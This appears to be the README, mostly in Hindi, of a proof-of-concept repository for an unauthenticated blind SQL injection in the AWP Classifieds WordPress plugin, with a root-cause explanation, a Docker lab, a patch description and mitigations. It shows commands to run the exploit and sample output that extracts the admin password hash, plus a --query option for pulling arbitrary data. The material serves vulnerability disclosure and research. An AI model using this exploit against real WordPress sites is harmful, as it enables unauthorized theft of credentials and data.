
AWP Classifieds <= 4.4.7 के लिए अनधिप्रमाणित समय-आधारित ब्लाइंड SQL इंजेक्शन PoC, जिसमें एक Docker लैब, पूर्ण राइटअप, और पैच डिफ शामिल है।
WordPress प्लगइन AWP Classifieds (another-wordpress-classifieds-plugin) में अनधिकृत समय-आधारित ब्लाइंड SQL इंजेक्शन, जो प्लगइन के अनाम (अतिथि) AJAX विज्ञापन-सबमिशन प्रवाह के माध्यम से पहुँच योग्य है।
| CVE | CVE-2026-59550 |
| प्लगइन | AWP Classifieds (another-wordpress-classifieds-plugin) |
| असुरक्षित | <= 4.4.7 |
| पैच किया गया | 4.4.8 |
| श्रेणी | SQL इंजेक्शन (OWASP A3: Injection) |
| विशेषाधिकार | अनधिकृत |
| CVSS v3.1 | 9.3 (उच्च) |
| सिंक | AWPCP_BasicRegionsAPI::save() - includes/regions-api.php |
| रिपोर्ट किया गया | Thaer Assfour (Patchstack के माध्यम से) |
| सलाहकार | https://patchstack.com/database/wordpress/plugin/another-wordpress-classifieds-plugin/vulnerability/wordpress-awp-classifieds-plugin-4-4-7-sql-injection-vulnerability |
AWPCP_BasicRegionsAPI::save() उपयोगकर्ता-आपूर्त regions सरणी की कुंजियों को सीधे $wpdb->insert() / $wpdb->update() में भेजता है। WordPress कॉलम नामों को बैकटिक्स में लपेटता है लेकिन उन्हें एस्केप नहीं करता, इसलिए बैकटिक युक्त कुंजी पहचानकर्ता से बाहर निकलकर मनमाना SQL इंजेक्ट करती है। regions सरणी $_POST से यथावत ली जाती है और जब भी अतिथि विज्ञापन पोस्टिंग सक्षम होती है (requireuserregistration = 0, डिफ़ॉल्ट), पूरी श्रृंखला बिना प्रमाणीकरण के पहुँच योग्य होती है।
4.4.8 में फिक्स एक स्पष्ट कॉलम अनुमति-सूची (filter_region_columns()) और सबमिट किए गए क्षेत्रों के लिए एक फ़ील्ड अनुमति-सूची (prepare_submitted_region()) जोड़ता है।
.
├── README.md # this file
├── docs/
│ └── WRITEUP.md # full technical writeup
├── exploit/
│ ├── exploit.py # unauthenticated blind SQLi PoC
│ └── requirements.txt
├── lab/
│ ├── docker-compose.yml # WordPress 6.8 + MariaDB 11, vuln + patched
│ ├── setup.sh # stage plugins, boot, provision both sites
│ └── teardown.sh # remove containers + volumes + staged files
└── patches/
├── 4.4.8-regions-api.diff # the security fix (single file)
└── 4.4.7-to-4.4.8-full.diff # complete release diff
आवश्यकताएँ: Docker + Docker Compose, Python 3 जिसमें requests, unzip हों।
# 1. build and provision the disposable lab (Docker only)
cd lab
./setup.sh /path/to/another-wordpress-classifieds-plugin.4.4.7.zip \
/path/to/another-wordpress-classifieds-plugin.4.4.8.zip
# -> vulnerable (4.4.7): http://localhost:8080/?page_id=8
# -> patched (4.4.8): http://localhost:8090/?page_id=8
# 2. run the PoC
cd ../exploit
python3 -m pip install -r requirements.txt
python3 exploit.py http://localhost:8080 # should be VULNERABLE
python3 exploit.py http://localhost:8090 # should be PATCHED
# 3. tear everything down
cd ../lab && ./teardown.sh
setup.sh दो प्लगइन आर्काइव को तर्क के रूप में या AWP447_ZIP / AWP448_ZIP पर्यावरण चर के माध्यम से स्वीकार करता है; यह ~/Downloads/<slug>.4.4.7.zip और ~/Downloads/<slug>.4.4.8.zip पर वापस आ जाता है।
आर्काइव इस रिपॉज़िटरी में कमिट नहीं किए गए हैं - कच्ची WordPress कोर और प्लगइन प्रतियाँ केवल lab/html-*/ के अंदर रहती हैं और git-ignored हैं।
[*] target : http://localhost:8080
[+] anonymous listing=17 transaction=e40d5a20c91e22db865cb6612f5c2908 nonce=f59eb541e1
[*] probing time-based oracle
[+] target is VULNERABLE to unauthenticated blind SQL injection
[+] admin / $wp$2y$10$AcAkM9QXI8OnCEEdht5G.eMnUX5y6Esb2BTEPN
[*] extracting data without authentication
[+] DBMS version : 11.8.9-MariaDB
[+] first WP user : admin
स्पष्ट क्वेरी के साथ मनमाना डेटा निकालें:
python3 exploit.py http://localhost:8080 \
--query "SELECT user_pass FROM wp_users ORDER BY ID LIMIT 1" \
--maxlen 60
PoC एक समय-आधारित ऑरेकल है, इसलिए इसे SQL आउटपुट के प्रतिबिंब की आवश्यकता नहीं है और यह पूरी तरह से ब्लाइंड लक्ष्य पर काम करता है।
// includes/regions-api.php (4.4.7)
public function save( $region ) {
...
$result = $this->db->insert( AWPCP_TABLE_AD_REGIONS, $region ); // keys -> SQL identifiers
}
पूर्ण टेंट विश्लेषण, अनुरोध ट्रेस, जनरेट किए गए-SQL प्रमाण और फिक्स चर्चा के लिए docs/WRITEUP.md देखें।
requireuserregistration = 1 लागू करें और/या awpcp_save_listing_information / awpcp_create_empty_listing AJAX क्रियाओं को ब्लॉक करें।यह सामग्री केवल रक्षात्मक सुरक्षा अनुसंधान, शिक्षा और अधिकृत परीक्षण के लिए प्रदान की गई है। इसका उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनका परीक्षण करने के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है। लैब पूरी तरह से कंटेनरीकृत और डिस्पोज़ेबल है।